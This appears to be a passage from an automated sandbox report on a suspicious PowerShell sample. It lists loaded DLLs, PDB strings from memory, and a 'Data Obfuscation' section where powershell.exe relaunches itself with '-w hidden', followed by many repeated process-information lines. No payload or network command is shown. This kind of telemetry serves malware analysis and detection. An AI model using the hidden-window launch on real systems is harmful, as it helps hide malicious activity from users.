Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptnet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: devenum.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: devobj.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msdmo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 00000006.00000002.1712288972.000001F27A016000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1712872404.000001F27A27B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32p source: powershell.exe, 00000006.00000002.1712872404.000001F27A27B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1712872404.000001F27A27B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb{ source: powershell.exe, 00000006.00000002.1712872404.000001F27A27B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Core.pdba source: powershell.exe, 00000006.00000002.1712288972.000001F27A016000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000006.00000002.1712872404.000001F27A27B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdbC source: powershell.exe, 00000006.00000002.1712872404.000001F27A27B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1712872404.000001F27A2A4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdbL source: powershell.exe, 00000006.00000002.1712872404.000001F27A27B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdb?yzL source: powershell.exe, 00000006.00000002.1711917889.000001F279FC8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dows\dll\System.Core.pdb source: powershell.exe, 00000006.00000002.1712288972.000001F27A016000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Powershell.PSReadline.pdb1 source: powershell.exe, 00000006.00000002.1711917889.000001F279FBB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1712288972.000001F27A016000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDBU+ source: powershell.exe, 00000006.00000002.1712872404.000001F27A27B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdbd source: powershell.exe, 00000006.00000002.1712288972.000001F27A016000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000006.00000002.1712872404.000001F27A27B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000006.00000002.1712872404.000001F27A27B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Powershell.PSReadline.pdbl source: powershell.exe, 00000006.00000002.1711917889.000001F279FBB000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B8B095D push esp; retf 6_2_00007FFD9B8B095E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B8A7938 push ebx; retf 6_2_00007FFD9B8A796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B8A785E push eax; iretd 6_2_00007FFD9B8A786D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B8A776A pushad ; iretd 6_2_00007FFD9B8A785D
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
